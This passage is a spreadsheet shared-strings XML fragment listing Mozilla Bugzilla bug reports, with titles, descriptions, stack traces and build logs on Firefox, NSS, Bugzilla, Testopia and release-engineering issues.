    <t>FIREFOX-266299</t>
  </si>
  <si>
    <t>browser.link.open_newwindow.restriction should have a default value of 2</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041026 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041026 Firefox/1.0
Options\Advanced\Tabbed Browsing
Force links that open new windows to open in:
This option badly needs an exception for javascript links especially when new
tab is selected.
Example cases: online game sites like pogo.com and zone.msn.com that open a java
applet game in its own little window are forced to use a new tab in the main
window. This new tab is then resized by the applet messing up all the other
tabs that are open.
Reproducible: Always
Steps to Reproduce:
1. Go to www.pogo.com
2. Make sure the Force links that open a new window to open in... is turned on
and that a new tab is selected.
3. Pick any game and enter a game room. Firefox will freak out.
Actual Results:  
Firefox resized itself to the game (Sweet Tooth in this case) according to the
applet's instructions rendering the web pages open in other tabs nearly
unreadable until I resized the window again correcting the other pages but
making the game look rather silly.
Expected Results:  
In this case since the game is opened via a javascript link it should open in
a new window.</t>
  </si>
  <si>
    <t>moof</t>
  </si>
  <si>
    <t>CORE-265897</t>
  </si>
  <si>
    <t>Crash in about:config after displaying submenu in context menu with certain CSS rule [@ 0x00000609] [@ nsBox::RelayoutDirtyChild]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041024 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041024 Firefox/1.0
When I have the following in my userContent.css:
*[accesskey]:after {
  content:  { attr(accesskey) }
  -moz-opacity: .4
}
I get crashes in about:config.  I right-click to get the context menu then
click New to get the submenu then I move the mouse outside of the menu and
click.  Most of the time I get a crash.
I'll mark it as normal because even though it's a crash it should be rare.
Reproducible: Sometimes
Steps to Reproduce:
1. Insert the CSS into userContent.css.
2. Start Firefox.
3. Go to about:config.
4. Right-click to get the context menu.
5. Click New.
6. Move the mouse outside of the menu.
7. If Firefox hasn't yet crashed click outside the menu.
8. If the menu closed without crashing repeat from step 4.
Actual Results:  
Crash.
Expected Results:  
The menu should have been closed.
Talkback crash ID: TB1493979X</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-216294</t>
  </si>
  <si>
    <t>display MIME type of the server in download dialog and not the mime-type returned by windows registry</t>
  </si>
  <si>
    <t>---- This is the 1.4 branch version of bug 184971 ----
basically if windows maps (e.g.) audio/x-mpegurl to .m3u and .m3u has a
mimetype of audio/mpegurl we show the latter mimetype in the dialog even if
the server sent the first one and we also store the wrong type in mimeTypes.rdf.
I would like this fixed on the 1.4 branch but not with the trunk's patch which
I consider too large and risky so filing a new bug.</t>
  </si>
  <si>
    <t>CORE-415422</t>
  </si>
  <si>
    <t>Fix gqi dep build (crash on startup)</t>
  </si>
  <si>
    <t>Firefox crashes at loading first page on start up.
I created debug build and ran it on GDB.
Program received signal SIGSEGV Segmentation fault.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xb63eb4ad in XULContentSinkImpl::OpenScript (this=0xb716f734 
    aAttributes=0xb7dc45dc aLineNumber=5)
    at /home/hideo/develop/mozilla/content/xul/document/src/nsXULContentSink.cpp:1094
1094	                                               value)
2008020215(JST) build didn't have this problem.</t>
  </si>
  <si>
    <t>hidenosuke</t>
  </si>
  <si>
    <t>CORE-502137</t>
  </si>
  <si>
    <t>Remove dead plugin scripting code.</t>
  </si>
  <si>
    <t>Created attachment 386651
Remove dead code.
Now that we no longer support XPCOM plugins there's some code in nsDOMClassInfo.cpp that no longer does anything useful. See attached patch.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-432003</t>
  </si>
  <si>
    <t>enable source server support on thunderbird windows tinderbox</t>
  </si>
  <si>
    <t>We should turn on source server support for Thunderbird windows trunk builds. Should be as easy as adding the marked lines in the URL to the tinder-config.pl.</t>
  </si>
  <si>
    <t>CORE-509636</t>
  </si>
  <si>
    <t>Assertion failure: pn-&gt;pn_type != TOK_COMMA at ../jsemit.cpp</t>
  </si>
  <si>
    <t>[]=[(00)]
asserts js dbg shell on TM branch (31079:3d4074b8928e) without -j at Assertion failure: pn-&gt;pn_type != TOK_COMMA at ../jsemit.cpp:3855 when parsed in as a file.
$ cat a.js
[]=[(00)]
$ ./js-dbg-tm-darwin a.js 
Assertion failure: pn-&gt;pn_type != TOK_COMMA at ../jsemit.cpp:3855
Trace/BPT trap
autoBisecting soon...</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-278638</t>
  </si>
  <si>
    <t>Owners list does not show Update product</t>
  </si>
  <si>
    <t>Owner me
peers: mconnor (mconnor@st) Ctho (cst@and)</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-374946</t>
  </si>
  <si>
    <t>patrocles has hung</t>
  </si>
  <si>
    <t>This is the tinderbox for Thunderbird on the Mozilla 1.8 branch and is tier 2 for support. Looks like it hung up on the build that started 2007/03/21 08:51 PDT but I don't think nagios noticed.</t>
  </si>
  <si>
    <t>BUGZILLA-302370</t>
  </si>
  <si>
    <t>remove the EmitFormElements routine from editproducts.cgi and templatize that code</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.6) Gecko/20050524 Firefox/1.0 (Ubuntu package 1.0.2 MFSA2005-44)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.6) Gecko/20050524 Firefox/1.0 (Ubuntu package 1.0.2 MFSA2005-44)
This routine is used to action add and edit. We could create a common template
file for both.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>gabriel.sales</t>
  </si>
  <si>
    <t>CORE-331772</t>
  </si>
  <si>
    <t>tooltiptext fails on XUL button  in HTML page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1
The tooltiptext attribute on an XUL button created in an HTML document by document.createElementNS fails.  The tooltip doesn't appear.  Behaves the same when loaded in chrome.
Reproducible: Always
Steps to Reproduce:
1. Load test case.
2. Hover cursor over button.
Actual Results:  
No tooltip appears.
Expected Results:  
A tooltip should appear.</t>
  </si>
  <si>
    <t>smolens</t>
  </si>
  <si>
    <t>CORE-216456</t>
  </si>
  <si>
    <t>'font' with system font keyword and 'font-family' with generic font family keyword behaving incorrectly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030815 Netscape/7.1 (ax svg)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030815
Read the notes in the test case for more info.
Reproducible: Always
Steps to Reproduce:
1. Open the test case.
2. Observe the results.
3. Check with the descriptions.
Actual Results:  
Using: 
{
  font: message-box
  font-family: sans-serif
}
The 'font-family' statement resets all other font properties which should(!) be
set by the 'font' shorthand property. This is a case with system font keyword
used with 'font' and later generic font family keyword applied to the
'font-family' property.
Expected Results:  
The 'font' shorthand property should set all other font properties in compliance
with the CSS spec therefore the above test case should not to fail.</t>
  </si>
  <si>
    <t>stanio</t>
  </si>
  <si>
    <t>CORE-370454</t>
  </si>
  <si>
    <t>Investigate if nsISVGValueObserver could inherit nsISupportsWeakReference</t>
  </si>
  <si>
    <t>If nsISVGValueObserver would inherit nsISupportsWeakReference the size of vtable should be smaller for many SVG objects I think.
Also that way the comment http://lxr.mozilla.org/seamonkey/source/content/svg/content/src/nsISVGValueObserver.h#52 would be really forced to be true.
Comments?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-278757</t>
  </si>
  <si>
    <t>sina.com.cn - contact info should be at the end of the page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Go to the URL.  It's a long web page and it's in Chinese.  In the 'first page'
which is the content at the beginning of the whole web page that appears in
browser window you can see some content overlap at the right hand side.  The
overlapping content (in which there's phone number) should be rendered at the
end of the whole page actually.  Please use an IE browser to see the difference.
Reproducible: Always
Steps to Reproduce:
1.go to the URL
2.see some content overlap
3.compare to IE's rendering.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-94876</t>
  </si>
  <si>
    <t>blogger.com - Edit Your Blog page looks great in IE poor in Mozilla</t>
  </si>
  <si>
    <t>You'll need to create a free account at www.blogger.com. Then create a new blog.
When you get the blog created go to the Edit Your Blog page. Compare this
page in IE and Mozilla. The page looks great in IE. It looks really bad in
Mozilla and some buttons are missing. I'm attaching two screen shots to save
you the trouble of signing up yourselves.</t>
  </si>
  <si>
    <t>NSS-220855</t>
  </si>
  <si>
    <t>CERT_NameToAscii fails when cert name attribute too long</t>
  </si>
  <si>
    <t>The End Entity cert for NIST test 4.3.10 which is in a file named
ValidRolloverfromPrintableStringtoUTF8StringTest10EE.crt has a
commonName attribute in the Subject Name that is 71 characters long. 
The commonName in question is:
Valid Rollover from PrintableString to UTF8String EE Certificate Test10 
NSS fails this test in two different ways.  This bug report is about one
of those failures.
NSS is unable to print the subject name of that cert because of the length
of the commonName attribute.  
RFC 3280 defines upper bounds for the lengths of the various attribute 
types in a Name.  The bound for a commonName attribute is 64 characters.  
NSS enforces that limit in CERT_CreateAVA and in CERT_NameToAscii.  
Both operations simply fail if any attribute's length exceeds its respective
upper bound.  If any attribute is too long CERT_NameToAscii returns NULL.
It doesn't return a string that contains any useful information about the
other attributes or about the attribute that was too long.  I think that's
bad.  
Some alternatives for CERT_NameToAscii are:
1. when an attribute is too long simply truncate it to the maximum length
and go on.
2. when an attribute is too long display Value Too Long instead of the 
actual value.
3. remove the length checks entirely
4. Raise the length limits so that no limit is less than say 128 or 256.</t>
  </si>
  <si>
    <t>BUGZILLA-80623</t>
  </si>
  <si>
    <t>Allow a param to duplicates.cgi to only list OPEN bugs</t>
  </si>
  <si>
    <t>Allow a param to duplicates.cgi to only list OPEN bugs I'm working on it...</t>
  </si>
  <si>
    <t>BUGZILLA-57819</t>
  </si>
  <si>
    <t>cut down large mysql error strings</t>
  </si>
  <si>
    <t>If msql reports a problem the resulting strings can be large. Example 
submitting a 10Mb file as an attachment (which fails) shows up with a missing
quote error. This takes aaaaaages to download.
Patch attached. Against todays bugzilla.
The patch takes out the middle bit and leaves the beginning and end of the 
error message in tact.</t>
  </si>
  <si>
    <t>n_hibma</t>
  </si>
  <si>
    <t>FIREFOX-469381</t>
  </si>
  <si>
    <t>Cooliris Previews addon not available/working for Firefox 3.5</t>
  </si>
  <si>
    <t>Hi Kevin
I see cooliris was updated to firefox 3.1 b1 but b2 is out now and b3pre is the latest version available to update on AMO.  beta3 is expected in January and we would like to see a lot of addons compatible with that release.  
Is cooliris in good shape for firefox 3.1?  let us know if you need any help.
there is somd documentation available here
https://developer.mozilla.org/en/Updating_extensions_for_Firefox_3.1</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-374921</t>
  </si>
  <si>
    <t>link error in gfxSurfaceRefCountTest (thebes.lib)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Head revision 22 March 2007
using mozillabuild 1.0
Reproducible: Always
Steps to Reproduce:
1. make -f client.mk
2.
3.
Actual Results:  
cl -FogfxSurfaceRefCountTest.obj -c  -DMOZILLA_INTERNAL_API -DOSTYPE=\WINNT5.1\ -DOSARCH=\WINNT\ -DBUILD_ID=0000000000  -I../../../dist/include/xpcom -I../../../dist/include/string -I../../../dist/include/thebes -I../../../dist/include/cairo -I../../../dist/include/pref -I../../../dist/include/thebes -I../../../dist/include   -I../../../dist/include -I../../../dist/include/nspr  -DMOZ_PNG_READ -DPNG_NO_MMX_CODE -DMOZ_PNG_WRITE        -GR- -TP -nologo -Zc:wchar_t- -W3 -Gy -FdgfxSurfaceRefCountTest.pdb  -DNDEBUG -DTRIMMED -O1 -I../../../dist/include/cairo  -MD            -D_CRT_SECURE_NO_DEPRECATE=1 -D_CRT_NONSTDC_NO_DEPRECATE=1 -DWINVER=0x500 -D_WIN32_WINNT=0x500 -D_WIN32_IE=0x0400 -DX_DISPLAY_MISSING=1 -DMOZILLA_VERSION=\1.9a3pre\ -DMOZILLA_VERSION_U=1.9a3pre -DHAVE_SNPRINTF=1 -D_WINDOWS=1 -D_WIN32=1 -DWIN32=1 -DXP_WIN=1 -DXP_WIN32=1 -DHW_THREADS=1 -DSTDC_HEADERS=1 -DWIN32_LEAN_AND_MEAN=1 -DNO_X11=1 -D_X86_=1 -DD_INO=d_ino -DMOZ_EMBEDDING_LEVEL_DEFAULT=1 -DMOZ_EMBEDDING_LEVEL_BASIC=1 -DMOZ_EMBEDDING_LEVEL_MINIMAL=1 -DMOZ_XULRUNNER=1 -DMOZ_BUILD_APP=xulrunner -DMOZ_XUL_APP=1 -DMOZ_DEFAULT_TOOLKIT=\cairo-windows\ -DMOZ_THEBES=1 -DMOZ_CAIRO_GFX=1 -DMOZ_DISTRIBUTION_ID=\org.mozilla\ -DOJI=1 -DIBMBIDI=1 -DMOZ_VIEW_SOURCE=1 -DACCESSIBILITY=1 -DMOZ_XPINSTALL=1 -DMOZ_JSLOADER=1 -DNS_PRINTING=1 -DNS_PRINT_PREVIEW=1 -DMOZ_NO_XPCOM_OBSOLETE=1 -DMOZ_XTF=1 -DMOZ_AIRBAG=1 -DMOZ_MATHML=1 -DMOZ_ENABLE_CANVAS=1 -DMOZ_SVG=1 -DMOZ_SVG_FOREIGNOBJECT=1 -DMOZ_UPDATE_CHANNEL=default -DMOZ_PLACES=1 -DMOZ_FEEDS=1 -DMOZ_STORAGE=1 -DMOZ_LOGGING=1 -DMOZ_USER_DIR=\Mozilla\ -DMOZ_ENABLE_LIBXUL=1 -DHAVE_UINT64_T=1 -DMOZ_XUL=1 -DMOZ_PROFILELOCKING=1 -DMOZ_RDF=1 -DMOZ_MORKREADER=1 -DMOZ_DLL_SUFFIX=\.dll\ -DJS_THREADSAFE=1 -DMOZILLA_LOCALE_VERSION=\1.9a1\ -DMOZILLA_REGION_VERSION=\1.9a1\ -DMOZILLA_SKIN_VERSION=\1.8\  -D_MOZILLA_CONFIG_H_ -DMOZILLA_CLIENT /c/mozilla-trunk/mozilla/gfx/thebes/test/gfxSurfaceRefCountTest.cpp
gfxSurfaceRefCountTest.cpp
make[6]: *** No rule to make target `../../../dist/lib/thebes.lib' needed by `gfxSurfaceRefCountTest.exe'.  Stop.
make[6]: Leaving directory `/c/mozilla-trunk/mozilla/obj-xulrunner/gfx/thebes/test'
make[5]: *** [tools] Error 2
make[5]: Leaving directory `/c/mozilla-trunk/mozilla/obj-xulrunner/gfx/thebes'
make[4]: *** [tools] Error 2
make[4]: Leaving directory `/c/mozilla-trunk/mozilla/obj-xulrunner/gfx'
make[3]: *** [tools_tier_gecko] Error 2
make[3]: Leaving directory `/c/mozilla-trunk/mozilla/obj-xulrunner'
make[2]: *** [tier_toolkit] Error 2
make[2]: Leaving directory `/c/mozilla-trunk/mozilla/obj-xulrunner'
make[1]: *** [default] Error 2
Expected Results:  
build should complete without errors
luser told me on irc that this is probably due to bug 78081
# my .mozconfig:
. $topsrcdir/xulrunner/config/mozconfig
mk_add_options MOZ_CO_PROJECT=xulrunner
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/obj-xulrunner
ac_add_options --enable-application=xulrunner</t>
  </si>
  <si>
    <t>moz-bugz</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-390881</t>
  </si>
  <si>
    <t>platform-dependent skins</t>
  </si>
  <si>
    <t>Created attachment 275195
actually seperates skin files for mac and pc others are default. no user-facing change
actually seperates skin files for mac and pc others are default. no user-facing change</t>
  </si>
  <si>
    <t>CORE-446363</t>
  </si>
  <si>
    <t>unused variable scrolledViewFlags in nsScrollPortView.cpp</t>
  </si>
  <si>
    <t>Saw this scroll by as I was watching a build.</t>
  </si>
  <si>
    <t>NSS-353909</t>
  </si>
  <si>
    <t>klocwork ptr dereference before NULL check in devutil.c</t>
  </si>
  <si>
    <t>ID:       76974
Function: create_object
Location: nss/lib/dev/devutil.c : 716
Suspicious dereference of pointer 'slot' by passing argument 6 to function 'nssCKObject_GetAttributes' at line 716 before NULL check at line 727
688	    NSSSlot *slot = NULL 
692	    slot = nssToken_GetSlot(object-&gt;token) 
716	    *status = nssCKObject_GetAttributes(object-&gt;handle 
717	                                        rvCachedObject-&gt;attributes 
718	                                        numTypes 
719	                                        arena 
720	                                        session 
721	                                        slot) 
727	    if (slot) { 
728		nssSlot_Destroy(slot) 
729	    } 
730	    return rvCachedObject 
731	loser: 
This is not the usual case of a null check in loser.</t>
  </si>
  <si>
    <t>CORE-528442</t>
  </si>
  <si>
    <t>[HTML5][Patch] Call WillCallDoneAddingChildren for SVG scripts</t>
  </si>
  <si>
    <t>The tree op executor should call WillCallDoneAddingChildren on newly-created SVG script elements to mark them as parser-created since the usual from parser flag has no effect on the SVG script creator function.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-298411</t>
  </si>
  <si>
    <t>webtree CVS account for Simon Fraser - smfr@smfr.org</t>
  </si>
  <si>
    <t>Hi Marcia
I used to have CVS access for mozilla.org (with sfraser@netscape.com or
sfraser@aol.net probably) but it no long seems to work for my current CVS login
(smfr@smfr.org). Can that be fixed?
Thanks
Simon</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-268285</t>
  </si>
  <si>
    <t>Support includenamespaceprefixes attribute on xforms  element.</t>
  </si>
  <si>
    <t>TOOLKIT-343779</t>
  </si>
  <si>
    <t>[meta] Extension Manager update RDF datasource issues</t>
  </si>
  <si>
    <t>This tracks Extension Manager backend issues regarding update RDF datasources</t>
  </si>
  <si>
    <t>FIREFOX-984872</t>
  </si>
  <si>
    <t>Remove deprecated promise.js usage in Firefox for Desktop</t>
  </si>
  <si>
    <t>Created attachment 8392849
The patch
This patch removes the remaining uses of Add-on SDK Promises in the Firefox for Desktop front-end code.
The only test that needed to be changed was the sanitizer. The production code was logically correct but the test assumed synchronous processing when clicking the OK button.</t>
  </si>
  <si>
    <t>paolo.mozmail</t>
  </si>
  <si>
    <t>CORE-352980</t>
  </si>
  <si>
    <t>[FIXr]Track extra submit element index to speed up parsing in some forms</t>
  </si>
  <si>
    <t>Quoting bz in bug 347165:
That said maybe we should actually keep track of the first submits in both
mInElements and mNotInElements?  With the current setup I worry that a single
submit followed by a bunch of image inputs will make life unhappy.  For
example we could store the indices in both rather than the element pointers. 
We'd need to maintain the indices a little on insertion and removal and change
GetDefaultSubmitElement to compare the two indices and return the right
thing... but then in this code we could simply do an index compare and be done
with it.
To summarize instead of tracking the default submit element we would track the index of the first submit element in the in-elements list and the first submit element in the not-in-elements list. The default submit element could be quickly determined from these. This would speed up parsing certain forms.
I'll come up with a testcase for this.</t>
  </si>
  <si>
    <t>jlurz24</t>
  </si>
  <si>
    <t>CORE-345050</t>
  </si>
  <si>
    <t>Turning off spellchecking is very slow when there are many misspellings.</t>
  </si>
  <si>
    <t>For example go here:
  http://en.wikipedia.org/w/index.php?title=Jimi_Hendrix&amp;action=edit
Without the patch on bug 344895 it might take many minutes to see. Then turn off spellchecking with the context menu for the textarea. It takes a noticeable amount of time.
The problem is in RemoveAllRanges() on the spellcheck selection. It iterates over all ranges and calls nsTypedSelection::selectFrames for each of them. This function is pretty scary and is likely the cause of the slowness.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-485564</t>
  </si>
  <si>
    <t>l10n builders should not be able to use all available slaves</t>
  </si>
  <si>
    <t>l10n builds routinely eat our slaves for breakfast lunch and dinner. At multiple times of the day we fire off around 150 build requests per platform (spread out between 1.9.1 and m-c). This ends up chewing up slave capacity until these builds are done. We should limit the amount of slaves each builder can use to a more reasonable number. Perhaps 1/3 per builder so that at most 2/3rds of each platforms' slaves will be used for l10n.
We might be able to accomplish this with a MasterLock.</t>
  </si>
  <si>
    <t>CORE-231199</t>
  </si>
  <si>
    <t>Make mapped-attribute hash case sensitive</t>
  </si>
  <si>
    <t>Rigth now the hash for 'uniqued' mapped attributes is case insensitive wrt the
values of the attributes. This is good and all in theory since it allows us to
squeeze more attribute-maps together and thus have a smaller rule-tree and fewer
attribute-maps allocated.
However the disadvantage of having a case insensitive hash is that it's slower
then a case sensitive one. Having a case sensitive one would also make it easier
to use the same code for SVG and possibly XUL. And we'd be able to save some
code. There are also some attributes in html that should be case sensitive (like
background) so if we want to keep the current code we need to fix it anyway.
And it'll speed up the cases where we don't have a lot of elements with the same
attributes since hashing case sensitivly is faster the case insensitivly. I
would think this is a pretty common case too although i don't have any data to
back that up.
And in practice making the hash case sensitive probably won't cause a noticable
difference in number of unique maps for a page. In most cases where there are a
lot of elements with the same attributes the markup is generated either using
some GUI designer (composer frontpage) or generated through CGI. In both cases
it's pretty likly that the same casing will be used everywhere. And even for
manually created pages i doubt that one and the same page will use more then two
or three different casings.
This also raises the issue of weather we should sort the mapped attributes
(which we do to make the hash attribute-order-insensitive). However the gain
seems a lot smaller here so before anyone does this we should probably
investigate weather we'd actually win anything.
As a sidenote i should mention that the current hash is actually partly
case-sensitive. The code to calculate hash-values is case sensitive but the code
to check equality is not. The endresult is that we most of the time already are
case sensitive. This has been the case since unique attributes were introduced.</t>
  </si>
  <si>
    <t>CORE-345434</t>
  </si>
  <si>
    <t>Firefox crashes with orca testcase [@nsHyperTextAccessible::GetRelativeOffset]</t>
  </si>
  <si>
    <t>1) Open www.google.com
2) Run testcase in bug 317482 in xterm
python bug_317482.py
3) Click firefox window press F11
4) Crash
Stack:
427       nsresult rv = aFromFrame-&gt;PeekOffset(aPresShell-&gt;GetPresContext() 
#0  0xb6f56781 in nsHyperTextAccessible::GetRelativeOffset (this=0x8d2c1b0
    aPresShell=0x8a43fd8 aFromFrame=0x0 aFromOffset=3
    aAmount=eSelectEndLine aDirection=eDirNext aNeedsStart=1)
    at nsHyperTextAccessible.cpp:427
#1  0xb6f57e00 in nsHyperTextAccessible::GetTextHelper (this=0x8d2c1b0
    aType=eGetAt aBoundaryType=5 aOffset=5 aStartOffset=0xbfb47d48
    aEndOffset=0xbfb47d44 aText=@0xbfb47c54) at nsHyperTextAccessible.cpp:545
#2  0xb6f57edc in nsHyperTextAccessible::GetTextAtOffset (this=0x8d2c1b0
    aOffset=5 aBoundaryType=5 aStartOffset=0xbfb47d48
    aEndOffset=0xbfb47d44 aText=@0xbfb47c54) at nsHyperTextAccessible.cpp:565
#3  0xb6f6662b in getTextAtOffsetCB (aText=0xb0d608c8 aOffset=5
    aBoundaryType=ATK_TEXT_BOUNDARY_LINE_START aStartOffset=0xbfb47dd8
    aEndOffset=0xbfb47dd4) at nsMaiInterfaceText.cpp:152
#4  0xb7940c22 in atk_text_get_text_at_offset (text=0xb0d608c8 offset=5
    boundary_type=ATK_TEXT_BOUNDARY_CHAR start_offset=0xbfb47dd8
    end_offset=0xbfb47dd4) at atktext.c:386</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-284523</t>
  </si>
  <si>
    <t>off by one error in delete attachments handling</t>
  </si>
  <si>
    <t>When implementing detach attachment I broke delete attachment somewhat. The
attachment gets deleted but the resulting message shows two deleted attachments.
Patch upcoming.</t>
  </si>
  <si>
    <t>SEAMONKEY-75544</t>
  </si>
  <si>
    <t>Unix NS commercial build broken when using wchar_t</t>
  </si>
  <si>
    <t>setting HAVE_CPP_2BYTE_WCHAR_T on AIX is causing compiler problems in
the commercial tree for AIX.  By having this define AIX uses the following:
typedef unsigned short wchar_t
typedef wchar_t PRUnichar
Then if you do:
typedef unsigned short xp_unichar
typedef xp_unichar OLECHAR
and try to pass a const OLECHAR * into a routine that takes a 
const PRUnichar * you get a compile error.
However if you don't define HAVE_CPP_2BYTE_WCHAR_T then
PRUnichar is typedef PRUint16 PRUnichar and it compiles fine.
So on AIX I want to disallow the use of wchar_t.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-518742</t>
  </si>
  <si>
    <t>need to update my public key</t>
  </si>
  <si>
    <t>Created attachment 402736
updated public key for Joel Maher
I have forgotten my passphrase and need to update my dsa keypair.  
Thanks</t>
  </si>
  <si>
    <t>CORE-402839</t>
  </si>
  <si>
    <t>Modal dialogs should use Linux's native icons</t>
  </si>
  <si>
    <t>In our efforts to feel more native on every platform we should use as many features that the OS provides. GNOME on Linux provides main icons for almost any type of modal dialog. We should probably use those since the ones we have now are a bit too shiny to fit in. Patch coming up.</t>
  </si>
  <si>
    <t>BUGZILLA-365504</t>
  </si>
  <si>
    <t xml:space="preserve">admin/products/list has useless </t>
  </si>
  <si>
    <t xml:space="preserve">
[% IF !showbugcounts %]
      Redisplay table with [% terms.bug %] counts (slower)</t>
  </si>
  <si>
    <t>BUGZILLA-451219</t>
  </si>
  <si>
    <t>PostgresSQL: Upgrade of Testopia results in error near the end of checksetup.pl</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1
Build Identifier: Testopia 2.0 Bugzilla 3.0.5 PostgresSQL 8.3.1
When trying to upgrade Testopia from version 1.3 to 2.0 I get the
following error when running checksetup.pl at the end of the process:
Checking Testopia setup ...
Updating column case_run_status_id in table test_case_run_status ...
Old: TINYSERIAL NOT NULL PRIMARY KEY
New: serial unique NOT NULL PRIMARY KEY
An error occurred processing hook install-update_db in
    extension ./extensions/testopia: DBD::Pg::db do failed: ERROR:  type
serial does not exist
 at Bugzilla/DB.pm line 525
Bugzilla::DB::bz_alter_column_raw('Bugzilla::DB::Pg=HASH(0x7f00c6b9de08)' 'test_case_run_status' 'case_run_status_id' 'HASH(0x7f00c3b79e98)' 'HASH(0x7f00c66303c0)' undef) called at Bugzilla/DB.pm line 484
        Bugzilla::DB::bz_alter_column('Bugzilla::DB::Pg=HASH(0x7f00c6b9de08)'
'test_case_run_status' 'case_run_status_id' 'HASH(0x7f00c3b79e98)')
called at ./extensions/testopia/code/install-update_db.pl line 103
        Bugzilla::Hook::testopiaUpdateDB() called
at ./extensions/testopia/code/install-update_db.pl line 31
        require ./extensions/testopia/code/install-update_db.pl called at
Bugzilla/Hook.pm line 46
        Bugzilla::Hook::process('install-update_db') called at
Bugzilla/Install/DB.pm line 529
        Bugzilla::Install::DB::update_table_definitions() called
at ./checksetup.pl line 195
I have tried this with Bugzilla version 3.0.2 3.0.4 and 3.0.5 with
similar results.
The setup of our Bugzilla/Testopia is as follows:
- Bugzilla version 3.0.5 (just upgraded from 3.0.2)
- Testopia version 1.3 (Upgrade to 2.0 appears to somewhat function
despite the error)
Modules/Checksetup output:
* This is Bugzilla 3.0.5 on perl 5.10.0
* Running on Linux 2.6.25-14.fc9.x86_64 #1 SMP Thu May 1 06:06:21 EDT
2008
Checking perl modules...
Checking for          CGI.pm (v3.33)   ok: found v3.38 
Checking for        TimeDate (v2.21)   ok: found v2.22 
Checking for             DBI (v1.41)   ok: found v1.601 
Checking for       PathTools (v0.84)   ok: found v3.2501 
Checking for Template-Toolkit (v2.12)   ok: found v2.19 
Checking for      Email-Send (v2.00)   ok: found v2.192 
Checking for      Email-MIME (v1.861)  ok: found v1.861 
Checking for Email-MIME-Modifier (v1.442)  ok: found v1.442 
Checking for            JSON (v2.10)   ok: found v2.11 
Checking for       Text-Diff (v0.35)   ok: found v0.35 
Checking for      GD-Graph3d (v0.63)   ok: found v0.63 
Checking available perl DBD modules...
Checking for          DBD-Pg (v1.45)   ok: found v1.49 
Checking for       DBD-mysql (v2.9003) ok: found v4.005 
The following Perl modules are optional:
Checking for              GD (v1.20)   ok: found v2.35 
Checking for     Template-GD (any)     ok: found v1.56 
Checking for           Chart (v1.0)    ok: found v2.4.1 
Checking for         GDGraph (any)     ok: found v1.44 
Checking for      GDTextUtil (any)     ok: found v0.86 
Checking for        XML-Twig (any)     ok: found v3.32 
Checking for      MIME-tools (v5.406)  ok: found v5.426 
Checking for     libwww-perl (any)     ok: found v2.036 
Checking for     PatchReader (v0.9.4)  ok: found v0.9.5 
Checking for      PerlMagick (any)     ok: found v6.3.8 
Checking for       perl-ldap (any)     ok: found v0.34 
Checking for       SOAP-Lite (any)     ok: found v0.68 
Checking for     HTML-Parser (v3.40)   ok: found v3.56 
Checking for   HTML-Scrubber (any)     ok: found v0.08 
Checking for Email-MIME-Attachment-Stripper (any)     ok: found v1.314 
Checking for     Email-Reply (any)     ok: found v1.202 
Checking for        mod_perl (v1.999022) ok: found v2.000003 
Reading ./localconfig...
Checking for          DBD-Pg (v1.45)   ok: found v1.49 
Checking for      PostgreSQL (v8.00.0000) ok: found v08.03.0100
Postgresql version:
# psql --version
psql (PostgreSQL) 8.3.1
contains support for command-line editing
It appears that when upgrading a postgresql setup of testopia it trys to
send MySql commands to the database which causes it to error out. Is it
not possible to upgrade Testopia when using postgres?
Reproducible: Always
Steps to Reproduce:
My method for upgrading Testopia is as follows:
# cd /var/www/virts/bugs
# patch -p0 -R -i testopia/patch-3.0
# wget testopia-2.0.tar.gz
# tar xzvf testopia-2.0.tar.gz
# patch -p0 -i testopia/patch-3.0
# ./checksetup.pl
When I ran patch -p0 -i testopia/patch-3.0.x at the end instead it did
not patch correctly and checksetup was halted earlier than this error.
Actual Results:  
